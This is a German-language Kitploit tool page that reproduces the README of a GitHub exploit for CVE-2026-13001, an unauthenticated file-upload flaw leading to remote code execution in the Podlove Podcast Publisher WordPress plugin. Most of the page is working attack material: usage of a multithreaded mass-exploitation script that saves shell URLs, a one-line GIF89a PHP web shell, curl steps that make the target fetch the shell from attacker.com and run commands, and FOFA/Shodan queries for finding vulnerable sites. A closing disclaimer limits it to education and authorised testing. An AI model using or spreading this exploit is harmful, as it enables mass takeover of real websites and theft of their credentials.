Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-13001 — Podlove Podcast Publisher: Unauthentifizierter Datei-Upload RCE durch is_image()- vs. extract_file_extension()-Abweichung | CVSS 9.8 | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-13001
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubshinthink/cve-2026-13001

CVE-2026-13001

Podlove Podcast Publisher: Unauthentifizierter Datei-Upload RCE durch is_image()- vs. extract_file_extension()-Abweichung | CVSS 9.8

Repository anzeigen
21vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-13001 — Podlove Podcast Publisher: Unauthentisierter Datei-Upload führt zu RCE

is_image() vs extract_file_extension() Nichtübereinstimmung → PHP-Polyglot-Upload


Übersicht

CVE-2026-13001 ist eine nicht authentisierte Schwachstelle mit kritischem Schweregrad (CVSS 9.8) für beliebigen Datei-Upload im Podlove Podcast Publisher WordPress-Plugin in Versionen ≤ 4.5.1.

Die Schwachstelle nutzt eine Nichtübereinstimmung zwischen zwei internen Funktionen aus, die Dateiendungen unterschiedlich parsen:

  • verwendet , was → URL erscheint als ✅ (gültiges Bild)
is_image()
basename()
Abfragezeichenfolgen einbezieht
shell.php?.gif
.gif
  • extract_file_extension() verwendet nur den Pfad von parse_url() → gibt .php zurück → Datei wird mit .php-Endung gespeichert 🚨
  • Angreifer laden GIF89a PHP-Polyglots (gültiger GIF-Header + eingebettetes PHP) hoch, die die Bildvalidierung bestehen, aber als PHP ausgeführt werden, wenn darauf zugegriffen wird.

    Betroffene Versionen

    VersionStatus
    ≤ 4.5.1Verwundbar
    4.5.2+Gefixt

    Entdeckt von: Talal Nasraddeen über Wordfence (14. Juli 2026)


    Schwachstellenmechanismus

    Grundursache

    root@kitploit:~
    // is_image() — verwendet basename() inkl. Abfragezeichenfolge
    function is_image($url) {
        $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
        return in_array($ext, ['jpg','jpeg','png','gif','webp']);
    }
    // URL: https://attacker.com/shell.php?.gif
    // basename() → "shell.php?.gif" → ext = "gif" ✅ UMGEHEN
    
    root@kitploit:~
    // extract_file_extension() — verwendet nur den Pfad von parse_url()
    function extract_file_extension($url) {
        $path = parse_url($url, PHP_URL_PATH);
        return pathinfo($path, PATHINFO_EXTENSION);
    }
    // URL: https://attacker.com/shell.php?.gif
    // parse_url() → "/shell.php" → ext = "php" 🚨 GESPEICHERT ALS .php
    

    Angriffsablauf

    root@kitploit:~
    1. Angreifer hostet GIF89a PHP-Polyglot auf attacker.com/shell.php?.gif
    2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
    3. is_image() validiert .gif-Endung → BESTANDEN
    4. Plugin lädt Datei herunter → speichert als test_original.php im Cache/
    5. Angreifer greift auf /wp-content/cache/podlove/{hash}/test_original.php zu
    6. PHP wird ausgeführt → RCE
    

    Installation

    root@kitploit:~
    git clone https://github.com/shinthink/CVE-2026-13001.git
    cd CVE-2026-13001
    pip install -r requirements.txt
    

    Verwendung

    root@kitploit:~
    # Einzelnes Ziel
    python cve_2026_13001.py -t ziel.de
    
    # Massen-Scan
    python cve_2026_13001.py -f targets.txt -o shells.txt
    
    # Eigene Payload-URL
    python cve_2026_13001.py -t ziel.de --payload-url https://ihr-server/shell.php?.gif
    
    # Debug-Modus, Shells hinterlassen
    python cve_2026_13001.py -t ziel.de --debug --no-cleanup
    

    Argumente

    root@kitploit:~
      -t, --target       Einzelnes Ziel (Domain oder IP)
      -f, --file         Zielliste, eine pro Zeile
      -o, --output       RCE-URLs in Datei speichern
      --payload-url      URL, die das PHP-Polyglot hostet (Standard: GitHub raw)
      --threads          Gleichzeitige Arbeiter (Standard: 30)
      --no-cleanup       Shells auf dem Ziel belassen
      --debug            Zeige jede HTTP-Anfrage
      -v, --verbose      Ausführliche Ausgabe
    

    Proof of Concept

    Einzelnes Ziel

    root@kitploit:~
    $ python cve_2026_13001.py -t podcast-site.de
    
    root@kitploit:~
      Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8
    
      Host       : podcast-site.de
      Podlove    : JA v4.5.1
      Upload     : JA
      RCE        : JA
      Shell      : https://podcast-site.de/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
      Ausgabe    : uid=33(www-data) gid=33(www-data)
      Zeit       : 4.2s
    

    Massen-Scan

    root@kitploit:~
      Ziele: 500  |  Threads: 30
      Payload-URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif
    
      [RCE] podcast-vuln-01.de       https://podcast-vuln-01.de/wp-content/cache/podlove/...
      [150/500] 30% | Det:42 RCE:8
    

    Manuelle Ausnutzung

    Schritt 1 — Ein Polyglot-Shell hosten

    root@kitploit:~
    // shell.php — speichern und auf eigenem Server hosten
    GIF89a<?php system($_GET['c']); ?>
    

    Schritt 2 — URL mit Umgehung hex-kodieren

    root@kitploit:~
    # URL: https://attacker.com/shell.php?.gif
    echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'
    

    Schritt 3 — Cache-Download auslösen

    root@kitploit:~
    curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'
    

    Schritt 4 — Auf die Shell zugreifen

    root@kitploit:~
    # Pfad: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
    curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'
    

    FOFA / Shodan

    root@kitploit:~
    FOFA:   body="podlove-podcasting-plugin-for-wordpress"
    Shodan: http.html:"podlove"
    

    Auswirkung

    Eine erfolgreiche Ausnutzung führt zur Remote-Code-Ausführung als Webserver-Benutzer:

    • Extraktion von wp-config.php → Datenbank-Zugangsdaten
    • Zugriff auf alle WordPress-Inhalte, Benutzer und Plugin-Daten
    • Platzierung persistenter Backdoors
    • Weiterleitung in interne Netzwerke

    Haftungsausschluss

    NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.

    Die Autoren übernehmen keine Haftung für Missbrauch.


    Referenzen

    RessourceLink
    Wordfence-Hinweiswordfence.com
    Podlove-Sicherheitsupdatepodlove.org
    NVD-EintragCVE-2026-13001
    PoC von Raimu0x19GitHub
    ForscherTalal Nasraddeen

    Nicht verbunden mit Podlove.

    Tool herunterladen